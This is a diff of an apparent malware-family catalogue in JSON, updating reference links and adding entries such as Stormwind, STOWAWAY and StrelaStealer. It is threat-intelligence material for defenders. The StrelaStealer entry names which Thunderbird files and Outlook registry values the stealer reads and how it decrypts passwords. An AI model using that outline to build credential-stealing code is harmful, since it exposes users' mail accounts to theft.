- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
"https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
"https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://intel471.com/blog/privateloader-malware"
+ "https://www.gdata.de/blog/1970/01/-35391-finger-weg-von-illegalen-software-downloads",
+ "https://github.com/vithakur/detections/blob/main/STOP-ransomware-djvu/IOC-list",
+ "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
+ "https://www.gdatasoftware.com/blog/2022/01/malware-vaccines",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/",
+ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
+ "https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/"
],
"synonyms": [
"Djvu",
@@ -43338,6 +45676,34 @@
"uuid": "447e5d7d-dd23-43b3-8cbc-b835498a49dd",
"value": "STOP"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stormwind",
+ "https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "98d5a891-f4dd-4c87-a019-1f1e7ab59301",
+ "value": "Stormwind"
+ },
+ {
+ "description": "According to Mandiant, STOWAWAY is a publicly available backdoor and proxy. The project supports several types of communication like SSH, socks5. Backdoor component supports upload and download of files, remote shell and basic information gathering.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stowaway",
+ "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government",
+ "https://blog.exatrack.com/melofee/",
+ "https://github.com/ph4ntonn/Stowaway"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cd187108-c557-42f8-8e48-1993abb37720",
+ "value": "STOWAWAY"
+ },
{
"description": "",
"meta": {
@@ -43350,15 +45716,28 @@
"uuid": "0439c5ec-306e-4473-84f7-50bdb5539fc2",
"value": "Stration"
},
+ {
+ "description": "According to PCRisk, StrelaStealer seeks to extract email account log-in credentials. At the time of writing, this program targets Microsoft Outlook and Mozilla Thunderbird email clients.\r\n\r\nFollowing successful infiltration, StrelaStealer searches for \"logins.json\" (account/password) and \"key4.db\" (password database) within the \"%APPDATA%\\Thunderbird\\Profiles\\\" directory - by doing so, it can acquire the credentials for Thunderbird.\r\n\r\nAlternatively, if Outlook credentials are targeted - StrelaStealer seeks out the Windows Registry from where it can retrieve the program's key and \"IMAP User\", \"IMAP Server\", as well as the \"IMAP Password\" values. Since the latter is kept in an encrypted form, the malicious program employs the Windows CryptUnprotectData feature to decrypt it prior to exfiltration.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strelastealer",
+ "https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "17f84079-56b8-4be5-bc59-75c8526b0ce0",
+ "value": "StrelaStealer"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint",
+ "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/",
"https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/",
"https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/",
- "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/",
- "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/"
+ "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/"
],
"synonyms": [],
"type": []
@@ -43371,6 +45750,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.strifewater_rat",
+ "https://www.secureworks.com/blog/abrahams-ax-likely-linked-to-moses-staff",
"https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard",
"https://www.cybereason.com/blog/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations"
],
@@ -43385,23 +45765,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity",
- "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://ti.qianxin.com/blog/articles/promethium-attack-activity-analysis-disguised-as-Winrar.exe/",
- "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html",
- "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf",
- "https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/",
- "https://mp.weixin.qq.com/s/5No0TR4ECVPp_Xv4joXEBg",
- "https://twitter.com/physicaldrive0/status/786293008278970368",
- "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/",
"https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/",
"https://0xthreatintel.medium.com/uncovering-apt-c-41-strongpity-backdoor-e7f9a7a076f4",
- "https://blog.minerva-labs.com/a-new-strongpity-variant-hides-behind-notepad-installation",
- "https://anchorednarratives.substack.com/p/recover-your-files-with-strongpity",
- "https://mp.weixin.qq.com/s/nQVUkIwkiQTj2pLaNYHeOA",
- "https://anchorednarratives.substack.com/p/tracking-strongpity-with-yara",
+ "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html",
+ "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/",
+ "https://ti.qianxin.com/blog/articles/promethium-attack-activity-analysis-disguised-as-Winrar.exe/",
+ "https://twitter.com/physicaldrive0/status/786293008278970368",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf",
+ "https://mp.weixin.qq.com/s/5No0TR4ECVPp_Xv4joXEBg",
+ "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/",
"https://blogs.blackberry.com/en/2021/11/zebra2104",
- "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/"
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://anchorednarratives.substack.com/p/recover-your-files-with-strongpity",
+ "https://anchorednarratives.substack.com/p/tracking-strongpity-with-yara",
+ "https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/",
+ "https://blog.minerva-labs.com/a-new-strongpity-variant-hides-behind-notepad-installation",
+ "https://mp.weixin.qq.com/s/nQVUkIwkiQTj2pLaNYHeOA"
],
"synonyms": [],
"type": []
@@ -43414,37 +45794,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet",
- "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf",
- "https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html",
"https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf",
- "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
- "https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper",
- "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://medium.com/s2wlab/w3-may-en-story-of-the-week-code-signing-certificate-on-the-darkweb-94c7ec437001",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
- "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html",
- "https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147",
- "https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
+ "https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper",
+ "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
+ "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
+ "https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147",
+ "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html",
+ "https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf",
+ "https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf",
+ "https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html",
+ "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
"https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/",
- "https://media.ccc.de/v/27c3-4245-en-adventures_in_analyzing_stuxnet"
+ "https://media.ccc.de/v/27c3-4245-en-adventures_in_analyzing_stuxnet",
+ "https://medium.com/s2wlab/w3-may-en-story-of-the-week-code-signing-certificate-on-the-darkweb-94c7ec437001",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "1b63293f-13f0-4c25-9bf6-6ebc023fc8ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6ad84f52-0025-4a9d-861a-65c870f47988",
"value": "Stuxnet"
},
@@ -43453,9 +45824,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.subzero",
+ "https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html",
"https://cdn.netzpolitik.org/wp-upload/2021/12/2018-08-28_DSIRF_Company-Profile-Gov.redacted.pdf",
"https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/",
- "https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html",
"https://netzpolitik.org/2021/dsirf-wir-enthuellen-den-staatstrojaner-subzero-aus-oesterreich/"
],
"synonyms": [
@@ -43472,8 +45843,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.suceful",
- "https://www.fireeye.com/blog/threat-research/2015/09/suceful_next_genera.html",
- "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf"
+ "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf",
+ "https://www.fireeye.com/blog/threat-research/2015/09/suceful_next_genera.html"
],
"synonyms": [],
"type": []
@@ -43527,179 +45898,180 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sunburst",
+ "https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection",
+ "https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/",
+ "https://www.brighttalk.com/webcast/7451/462719",
+ "https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q",
+ "https://www.microsoft.com/security/blog/2021/01/14/increasing-resilience-against-solorigate-and-other-sophisticated-attacks-with-microsoft-defender/",
+ "https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q",
+ "https://notes.netbytesec.com/2021/01/solarwinds-attack-sunbursts-dll.html",
+ "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline",
+ "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html",
+ "https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/",
+ "https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/",
+ "https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/",
+ "https://www.domaintools.com/resources/blog/change-in-perspective-on-the-utility-of-sunburst-related-network-indicators#",
+ "https://www.gov.pl/web/diplomacy/statement-on-solar-winds-orion-cyberattacks",
+ "https://netresec.com/?b=211cd21",
+ "https://www.cyborgsecurity.com/blog/sunburst-solarwinds-supply-chain-attack/",
+ "https://twitter.com/cybercdh/status/1338975171093336067",
+ "https://therecord.media/solarwinds-says-fewer-than-100-customers-were-impacted-by-supply-chain-attack",
+ "https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html",
+ "https://www.bleepingcomputer.com/news/security/mimecast-links-security-breach-to-solarwinds-hackers/",
+ "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
+ "https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/",
+ "https://www.mfa.gov.lv/en/news/latest-news/67813-latvia-s-statement-following-the-announcement-by-the-united-states-of-actions-to-respond-to-the-russian-federation-s-destabilizing-activities",
+ "https://docs.google.com/spreadsheets/d/1u0_Df5OMsdzZcTkBDiaAtObbIOkMa5xbeXdKk_k0vWs",
+ "https://github.com/SentineLabs/SolarWinds_Countermeasures",
+ "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610",
+ "https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident",
+ "https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf",
+ "https://www.fireeye.com/current-threats/sunburst-malware.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/",
+ "https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947",
+ "https://twitter.com/cybercdh/status/1338885244246765569",
+ "https://github.com/fireeye/Mandiant-Azure-AD-Investigator",
+ "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/",
+ "https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf",
+ "https://www.cadosecurity.com/post/responding-to-solarigate",
+ "https://blog.gigamon.com/2021/07/27/ghosts-on-the-wire-expanding-conceptions-of-network-anomalies/",
+ "https://twitter.com/ItsReallyNick/status/1338382939835478016",
+ "https://www.prevasio.io/blog/sunburst-backdoor-a-deeper-look-into-the-solarwinds-supply-chain-malware",
+ "https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/",
+ "https://blog.cloudflare.com/solarwinds-orion-compromise-trend-data/",
+ "https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a",
+ "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/",
+ "https://corelight.blog/2020/12/15/finding-sunburst-backdoor-with-zeek-logs-and-corelight/",
+ "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/",
+ "https://www.youtube.com/watch?v=mbGN1xqy1jY",
+ "https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306",
+ "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/",
+ "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://www.cisa.gov/news/2021/01/05/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure",
+ "https://www.brighttalk.com/webcast/7451/469525",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-command-control",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/additional-analysis-into-the-sunburst-backdoor/",
+ "https://www.mimecast.com/incident-report/",
+ "https://www.bleepingcomputer.com/news/security/fireeye-microsoft-create-kill-switch-for-solarwinds-backdoor/",
+ "https://github.com/RedDrip7/SunBurst_DGA_Decode",
+ "https://news.sophos.com/en-us/2020/12/14/solarwinds-playbook/",
+ "https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f",
+ "https://twitter.com/KimZetter/status/1338305089597964290",
+ "https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/",
+ "https://www.prevasio.io/blog/sunburst-backdoor-part-ii-dga-the-list-of-victims",
+ "https://labs.sentinelone.com/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/",
+ "https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc",
+ "https://www.youtube.com/watch?v=GfbxHy6xnbA",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/",
+ "https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/",
+ "https://us-cert.cisa.gov/remediating-apt-compromised-networks",
+ "https://www.cyborgsecurity.com/cyborg_labs/threat-hunt-deep-dives-solarwinds-supply-chain-compromise-solorigate-sunburst-backdoor/",
+ "https://r136a1.info/2022/06/18/using-dotnetfile-to-get-a-sunburst-timeline-for-intelligence-gathering/",
+ "https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling",
+ "https://www.netresec.com/?page=Blog&month=2020-12&post=Reassembling-Victim-Domain-Fragments-from-SUNBURST-DNS",
+ "https://netresec.com/?b=211f30f",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
+ "https://www.4hou.com/posts/KzZR",
+ "https://www.comae.com/posts/sunburst-memory-analysis/",
+ "https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html",
+ "https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/",
+ "https://www.youtube.com/watch?v=dV2QTLSecpc",
"https://ics-cert.kaspersky.com/reports/2021/01/26/sunburst-industrial-victims/",
+ "https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/",
+ "https://github.com/github/codeql/tree/main/csharp/ql/src/experimental/Security%20Features/campaign",
+ "https://community.riskiq.com/article/9a515637",
+ "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714",
+ "https://zengo.com/ungilded-secrets-a-new-paradigm-for-key-security/",
+ "https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html",
+ "https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view",
+ "https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution",
+ "https://www.consilium.europa.eu/en/press/press-releases/2021/04/15/declaration-by-the-high-representative-on-behalf-of-the-european-union-expressing-solidarity-with-the-united-states-on-the-impact-of-the-solarwinds-cyber-operation",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data",
+ "https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000173994221000076/swi-20210507.htm",
+ "https://youtu.be/SW8kVkwDOrc?t=24706",
+ "https://www.mandiant.com/media/10916/download",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds",
+ "https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/",
+ "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html",
+ "https://twitter.com/megabeets_/status/1339308801112027138",
+ "https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance",
+ "https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth",
+ "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/",
+ "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
"https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
"https://www.netresec.com/?page=Blog&month=2020-12&post=Extracting-Security-Products-from-SUNBURST-DNS-Beacons",
- "https://www.youtube.com/watch?v=JoMwrkijTZ8",
- "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/",
- "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
- "https://youtu.be/Ta_vatZ24Cs?t=59",
- "https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident",
- "https://therecord.media/solarwinds-says-fewer-than-100-customers-were-impacted-by-supply-chain-attack",
- "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
- "https://pastebin.com/6EDgCKxd",
- "https://github.com/RedDrip7/SunBurst_DGA_Decode",
- "https://www.domaintools.com/resources/blog/change-in-perspective-on-the-utility-of-sunburst-related-network-indicators#",
- "https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html",
- "https://twitter.com/cybercdh/status/1338885244246765569",
- "https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug",
- "https://www.youtube.com/watch?v=-Vsgmw2G4Wo",
- "https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst",
- "https://github.com/SentineLabs/SolarWinds_Countermeasures",
- "https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/",
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
- "https://www.netresec.com/?page=Blog&month=2020-12&post=Reassembling-Victim-Domain-Fragments-from-SUNBURST-DNS",
- "https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/",
- "https://www.microsoft.com/security/blog/2021/01/14/increasing-resilience-against-solorigate-and-other-sophisticated-attacks-with-microsoft-defender/",
- "https://www.microsoft.com/security/blog/2021/02/25/microsoft-open-sources-codeql-queries-used-to-hunt-for-solorigate-activity/",
- "https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/",
- "https://www.elastic.co/blog/supervised-and-unsupervised-machine-learning-for-dga-detection",
- "https://www.mimecast.com/blog/important-security-update/",
- "https://docs.google.com/spreadsheets/d/1u0_Df5OMsdzZcTkBDiaAtObbIOkMa5xbeXdKk_k0vWs",
- "https://www.youtube.com/watch?v=dV2QTLSecpc",
- "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html",
- "https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards",
- "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach",
- "https://www.solarwinds.com/securityadvisory/faq",
- "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:MSIL/Solorigate.B!dha",
- "https://github.com/sophos-cybersecurity/solarwinds-threathunt",
- "https://notes.netbytesec.com/2021/01/solarwinds-attack-sunbursts-dll.html",
- "https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack",
- "https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/",
- "https://www.bleepingcomputer.com/news/security/mimecast-links-security-breach-to-solarwinds-hackers/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/additional-analysis-into-the-sunburst-backdoor/",
- "https://www.cisa.gov/news/2021/01/05/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure",
- "https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/",
- "https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/",
- "https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/",
- "https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html",
- "https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/",
- "https://securelist.com/sunburst-backdoor-kazuar/99981/",
- "https://netresec.com/?b=211f30f",
- "https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/",
- "https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q",
- "https://www.youtube.com/watch?v=cMauHTV-lJg",
- "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/",
- "https://www.mandiant.com/media/10916/download",
- "https://www.prevasio.io/blog/sunburst-backdoor-part-ii-dga-the-list-of-victims",
- "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/",
- "https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html",
- "https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/",
- "https://unit42.paloaltonetworks.com/atoms/solarphoenix/",
- "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
- "https://twitter.com/0xrb/status/1339199268146442241",
- "https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f",
- "https://r136a1.info/2022/06/18/using-dotnetfile-to-get-a-sunburst-timeline-for-intelligence-gathering/",
- "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more",
- "https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html",
- "https://github.com/github/codeql/tree/main/csharp/ql/src/experimental/Security%20Features/campaign",
- "https://twitter.com/Intel471Inc/status/1339233255741120513",
- "https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view",
- "https://www.youtube.com/watch?v=GfbxHy6xnbA",
- "https://twitter.com/megabeets_/status/1339308801112027138",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/",
- "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://twitter.com/ItsReallyNick/status/1338382939835478016",
- "https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095",
- "https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution",
- "https://twitter.com/cybercdh/status/1338975171093336067",
- "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html",
- "https://thenewstack.io/behind-the-scenes-of-the-sunburst-attack/",
- "https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306",
- "https://www.bleepingcomputer.com/news/security/autodesk-reveals-it-was-targeted-by-russian-solarwinds-hackers/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-attacks-stealthy-attackers-attempted-evade-detection",
- "https://corelight.blog/2020/12/15/finding-sunburst-backdoor-with-zeek-logs-and-corelight/",
- "https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf",
- "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
- "https://www.mimecast.com/incident-report/",
- "https://www.cyborgsecurity.com/blog/sunburst-solarwinds-supply-chain-attack/",
- "https://twitter.com/cybercdh/status/1339241246024404994",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-unique-dga",
- "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610",
- "https://www.prevasio.io/blog/sunburst-backdoor-a-deeper-look-into-the-solarwinds-supply-chain-malware",
